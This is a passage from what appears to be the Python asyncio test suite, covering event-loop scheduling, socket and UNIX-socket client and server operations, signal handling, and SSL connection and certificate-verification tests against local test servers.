self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv_into(sock, bytearray()))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def _basetest_sock_recv_into(self, httpd, sock):
# same as _basetest_sock_client_ops, but using sock_recv_into
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = bytearray(1024)
with memoryview(data) as buf:
nbytes = self.loop.run_until_complete(
self.loop.sock_recv_into(sock, buf[:1024]))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv_into(sock, buf[nbytes:]))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
sock = socket.socket()
self._basetest_sock_recv_into(httpd, sock)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_recv_into(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
def test_legacy_create_ssl_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_connection()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_legacy_create_ssl_unix_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_unix_connection()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
self.test_connect_accepted_socket(server_context, client_context)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_unix_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_unix_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
server.close()
def test_legacy_create_server_ssl_match_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_match_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
